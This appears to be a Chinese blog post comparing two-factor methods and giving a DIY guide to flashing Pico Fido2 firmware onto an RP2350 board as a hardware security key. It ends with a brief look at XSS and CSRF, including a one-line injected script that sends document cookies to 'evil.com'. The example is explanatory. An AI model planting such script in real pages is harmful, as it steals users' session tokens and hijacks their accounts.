低成本打造一个独属于你自己的 PicoKey 安全密钥！—— LingXiの折腾记①

一、短信 SMS 验证#

短信 SMS 作为目前广泛用于双重认证，甚至在不少服务中是登录时的唯一凭证。但作为 1986 年就定义的协议，时至今日 SMS 早就已经落伍了！关于 SMS 通信通道不安全的研究已经有很多了，利用 GSM 劫持和短信嗅探进行电信诈骗的案例也比比皆是。所以它虽然方便，但从安全的角度来看短信确实不适合作为首要（甚至是唯一的）双重认证的手段。

二、基于2FA的验证器通知验证(MFA)#

我们以 Microsoft Authenticator 为例：

使用 Microsoft Authenticator 设置双因素身份验证后，每次尝试在线访问帐户时，您都会在移动设备上收到通知或需要提供以验证身份的验证码。 这增加了额外的安全层，因为只有您才能访问您的移动设备。 请记住保持 Microsoft Authenticator 应用程序更新，并使用 PIN 码或面部识别来保护您的移动设备，以防止未经授权的访问。

三、TOTP协议#

不少网站和服务都会采用基于时间的一次性密码 TOTP，TOTP 确实要比短信来得安全得多。首先，与传统的静态密码相比，TOTP 动态生成的一次性密码更加安全，因为它只在特定的时间段内有效，并且生成过程基于共享的密钥和相同的时间，而共享的密钥只会在初次设置时进行交换。

其次，实现 TOTP 技术因为不需要专门的硬件，所以实现成本很低，用户使用时只需要安装一个支持 TOTP 的软件即可，无论是智能手机、可穿戴设备或是电脑上都有对应的软件可以选择。最后，TOTP 对于网站和服务来说也非常便于接入到身份验证系统中，因此 TOTP 支持得非常广泛。

但 TOTP 也有自己的局限，TOTP 最大的问题就是不能抵御中间人攻击，在 MitM 攻击中，攻击者会在通信的两端之间插入自己的设备，以拦截、篡改和窃取数据。如果用户正在遭受 MitM 攻击，攻击者不仅会伪造一个有用户名和密码的登陆框，还会伪造一个看起来像身份验证令牌的页面，要求用户输入他们的令牌信息。然后，攻击者可以使用这些信息欺骗真正的身份验证服务器，并成功访问用户的帐户。

除了不能抵御 MitM，使用 TOTP 的步骤我也觉得有点麻烦。首先就是输入麻烦，如果用密码管理工具快速填充密码的话，往往还需要单独打开一个 TOTP 的软件手动输入那一串验证码；如果把 TOTP 同样保存到那个密码管理工具，不免有把「鸡蛋都放一个篮子里」的嫌疑。

这时候随着银行卡一起给我的银行 U 盾给了我新的灵感，在大额转账的时候只需要点一下 U 盾上的按钮就可以完成身份验证，可以说是非常方便。而和 U 盾类似的安全密钥自然就成为了我替代传统 TOTP 的方式。

四、物理安全密钥#

用安全密钥存储和生成一次性密码的方法也被称为 U2F（通用第二因素），基于安全密钥「软件只能写入密钥但不能读取密钥」的特性， U2F 也能有效地抵御 MItM 攻击。

当我们使用安全密钥进行认证的时候，网页会首先发送一个「挑战（challenge）」给安全密钥，安全密钥会根据内部存储的私钥（可以理解成信箱的钥匙），解开这个「挑战（challenge）」并把对应的结果返回给服务器。无论是谁都看不到放在安全密钥的私钥，而服务器上只有正确的公钥加密的信息才可以被私钥解锁，因为投递人只有知道那个信箱是你才能把信寄给你。

除了更安全，安全密钥自然也有着使用方便的特点，在电脑平台上直接插入到 USB 接口中就可以让其他程序调用，身份验证时也只需要额外进行一次触摸即可。至于在移动上，除了插入接口进行认证，也可以在支持 NFC 的设备上扫描 NFC 进行验证。整个流程非常简单，就和使用银行 U 盾一样。

前面我们也提到过，安全密钥还支持存储多种不同的加密类型，如果网站或者服务不支持 U2F 的话，不少安全密钥，比如 Yubikey 旗下的产品也支持存储支持更为广泛的 TOTP，填写时也只需要简单触摸一下安全密钥就可以自动填充。另外一些加密类型也可以在特定的场景下发挥作用，比如 PIV 智能卡可以用于替代门禁卡，OpenPGP 则是加密文件、邮件的常用方式。

安全密钥小巧的体型也能算是它的一个优点，携带会非常方便；不过这其实也是一个缺点，小巧的体型也意味着容易遗失。如果设备丢失，不仅需要需要重新配置身份验证过程，还有可能被身份认证挡在门外。所以如果要使用安全密钥除了 FIDO2 以外的加密类型的话，我的建议是多准备一个安全密钥进行备份；而 FIDO2 作为实现通信密钥的基石，可以使用身边的手机和其他支持的软件额外进行设置。

安全密钥虽然有着众多的加密类型，但也不是万能的，如果网站只愿意使用 SMS 或者私有认证方式进行两步认证的方式的话，安全密钥自然也帮不上忙；安全密钥的使用成本也不低，毕竟一次就要买 2 个，如果丢失的话也需要再次入手，对于大部分人来说确实不那么值得。

不过，目前来看安全密钥也算是解决了我此前使用软件 TOTP 时的种种不满，顺便还让一部分账户变得更为安全了。

一、YubiKey#

Yubico 是一家美国的公司，是 YubiKey 的制造商。YubiKey 是这家公司生产的硬件安全密钥。这个东西有点像以前很多银行要用的「U 盾」，是硬件层面保障安全性的一个东西。

2023 年， Cloudflare 推出的 Yubikey 促销 掀起了一波小小的硬件密钥热潮, 很多人都通过国际代购，转运低价购入了 Yubikey. 不过转眼过去了两年, 之后再没有过类似的优惠, 国内现货的价格也一直居高不下 (目前为 ~500RMB).

看到这个产品，我想说的一句话是：这太TM贵了！ 这样的价格对我一个 安卓人 学生来说是承担不起的（（。如果这样的小玩意弄丢了，这将是一个极大的损失（同时账号也丢了）！

二、OpenSK#

由谷歌开源的 OpenSK 使用的是 nRF52840 方案，淘宝上可以搜索到 nRF52840-MDK USB Dongle 相关硬件, 但硬件价格在 100-240RMB 之间，成本也巨大。

三、CanoKeys#

CanoKeys 虽然有 nRF 和 STM32 的方案, 但官方已经表明 任何接触到设备的人可以获取明文密钥 ！不适合日用。官方在淘宝有售卖使用 HED CIU98320B 的安全版本 CanoKey Pigeon 和 CanoKey Canary.

四、Picokey#

以上三个方案成本都非常高昂，至少都在 100 RMB 以上。还好前人们都作总结了，都推荐基于 Rasbperry Pi RP2040/RP2350 或 ESP32S3 开发板的 Pico Fido2 项目，其中树莓派的芯片开发板选择多，流行度高，在大陆易于买到，且价格很低 (约 30RMB)。

而恰好, 本次的 Pico Keys 项目就用到了RP2350这款芯片的Secure Boot和OTP 功能用于保护保存的密钥在物理接触时不被提取或复制, 所以我更相信它的安全性。

硬件购买#

RP2350 只是芯片型号，市面上有很多搭载该芯片的开发板，经前人们推荐我挑选了微雪Waveshare的RP2350-One，这款芯片可以非常轻松的在淘宝上以 30 元左右的价格包邮买到。Pico Keys 还支持其他各式各样的开发板, 可以自行选择最容易购买到或者最便宜的。

准备材料#

1. Waveshare RP2350-One 开发板(其他开发板参考其他相对应的教程)

2. 在 Pico Fido2 项目下载下来的 UF2 固件(pico_fido_pico2-7.6.uf2 或者下载专用于微雪的FIDO2固件👉：pico_fido_waveshare_rp2350_one-6.6.uf2)

3. 一台搭载了 Windows 10 22H2 或 Windows 11 24H2 及以上的 PC/笔记本 (Linux 任意主流发行版任意内核版本也行)，且确保没有附带任何不安全的环境（比如被入侵木马）

Step1: 刷写固件#

详细步骤：

• 按住开发板上的BOOT键插入电脑，将会在资源管理器中看到它识别成一个U盘
• 把下载好的UF2固件拖入/复制到U盘

做完过后，它会自动刷入并重启, 全程丝滑无需任何驱动或专有工具。接下来你需要拔出开发板并等待1分钟，以便后续操作顺利。

Step2: 设备配置#

目前还有现存的在线版Pico Commissioner供大家使用，操作方式与原先的基本相同。

或者使用Picoforge项目进行本地配置，

在线版具体核心步骤：#

1. 插入开发板，在WebUSB页面点击Connect，浏览器弹出提示后点确认连接，如果能正常显示信息则连接成功

2. 点击PHY界面，跟着设置如下：

   • 设置 Vendor 为: Yubikey5
   • VID & PID 保持默认 (其实在线版这里根本改不了)
   • Product Name 设置为: Yubico Yubikey
   • 按钮超时时间可自己设置，这里设置为30秒
   • LED GPIO 引脚(Pin)设置为16，亮度设置为1-7之间，Options勾选Dimmable和Steady，LED驱动选择WS2812或WS2812_Swap

3. 设置完后，点击Commission按钮应用设置，记得为密钥设置PIN码并记住。

Picoforge 配置教程核心步骤：#

1. 插入开发板，点击左侧Configuration进入界面，并在左下角点击Refresh，确认设备状态显示为Online并且Overview界面信息显示正常后开始操作

2. 跟着设置如下：

   • Identity 板块 Vendor Preset 选择YubiKey 5 (1050:0407)
   • Vendor ID 和 Product ID 保持默认(值分别为1050和0407)
   • Product Name 设置为: Yubico Yubikey
   • LED GPIO 引脚(Pin)设置为16，LED驱动选择WS2812 (Neopixel)，亮度设置为1-7之间，勾选LED Dimmable和LED Steady Mode
   • 按钮超时时间可自行设置
   • 开启Power Cycle on Reset

3. 设置完成后，点击Apply Change按钮应用设置，记得为密钥设置PIN码并记住。

⚠️警告！

如果你想为了安全起见，可以开启Secure Boot和Secure Lock，但是这样开启后只能刷入Picokey提供的官方固件，不能再进行二次开发，建议正式使用的时候再开启！ 如果你又想 DIY 又想安全的话可以尝试自签。

测试密钥可用性#

访问Webauthn.io，测试一下这把 DIY 密钥的功能，根据网站与浏览器的引导进行操作即可。

微软账号 (Microsoft Account)#

登录account.live.com，进入管理界面后点击侧边栏的安全选项，然后点击“管理登录方式”并进行安全验证

在这个界面中滑下来找到添加另一种登录账户的方式。，然后在“添加一种新的登录或验证方法”窗口中选择人脸、指纹、PIN 或安全密钥

根据浏览器指引，会弹出新窗口引导你选择保存密钥的位置,这里选择使用外部安全密钥！

接着会唤醒本地的 Windows 安全中心并继续引导你绑定安全密钥，插入密钥后输入PIN码，在提示“触摸安全密钥”时按下开发板密钥上的BOOT键即可，如提示“为密钥设置名称”则成功绑定！最后根据微软的提示为新绑定的密钥设置名称！

Google 账号#

登录account.google.com，进入管理界面后点击侧边栏的安全性与登录选项，然后点击“通行密钥和安全密钥”并进行安全验证

进入后，点击创建通行密钥

接下来的指引与微软账号配置密钥时相同，就是选择存储在外部安全密钥-插入密钥-输入 PIN 码-触摸安全密钥即可，最后提示如下图则为成功绑定，后续可以在谷歌密钥管理界面自己设定密钥名称。

根据这波指引下来：🎉恭喜你！你已成功进入安全密钥令牌的世界！🎉 您的账号安全性将几乎无人匹敌(哦是吗?)，大大降低了被盗号的风险与概率。

安全密钥是如何工作的？#

安全密钥通过USB或蓝牙与设备通信来工作，在使用安全密钥进行身份验证之前，必须验证正在使用的服务的兼容性，然后向服务注册密钥，然后可以使用该密钥和密码一起登录该服务。

当用户尝试登录支持安全密钥的服务时，系统会提示用户插入或点击安全密钥以验证身份。安全密钥依赖于公钥加密协议，如FIDO U2F和FIDO2，这些密钥超越了传统的身份验证方法，提供了更强的保护，防止网络钓鱼和凭证盗窃。

以下是安全密钥的工作原理：

• 密钥对：安全密钥会生成唯一的公钥和唯一的私钥，公钥存储在用户正在使用的在线服务中，而私钥存储在安全密钥的硬件芯片中。

• 登录启动：当登录支持安全密钥的服务时，需要像往常一样输入用户名和密码。

• 询问-响应身份验证：该服务会生成一个唯一的质询并将其发送到安全密钥，安全密钥使用其私钥对质询进行签名，并将签名的响应发送到服务。

• 验证：该服务使用存储在其系统中的公钥验证签名。如果它们匹配，则授予访问权限。

此过程消除了恶意拦截代码或破坏基于软件的身份验证器的风险，即使他们设法窃取了密码，也无法绕过计算机和服务安全密钥的物理存在和加密验证。

此外，我在另外一个哔站视频评论区看到了以下楼层，这引发了我极大的思索：

省流：简单来说，黑客偷的不是你硬件密钥载体上的私钥，而是偷的签名后的验证信息，也就是存储在 Cookie 中的 Token 令牌。什么意思呢，就是你回家路上被小偷跟踪了，你用智能门锁用指纹开门进入你的大豪斯的时候，小偷在你没注意的瞬间飞入了你家里，然后偷走了你所有的钱。但是这种作案过程中，小偷不是复制了你的指纹，而是在你开门的刹那闯进去了，就这么简单粗暴！

黑客如何跨过安全密钥门槛盗取你的账号？#

比较常见的攻击方式就两个：CSRF攻击 和 XSS攻击

1
// 攻击者注入的恶意脚本
2
fetch('https://evil.com/steal?cookie=' + document.cookie);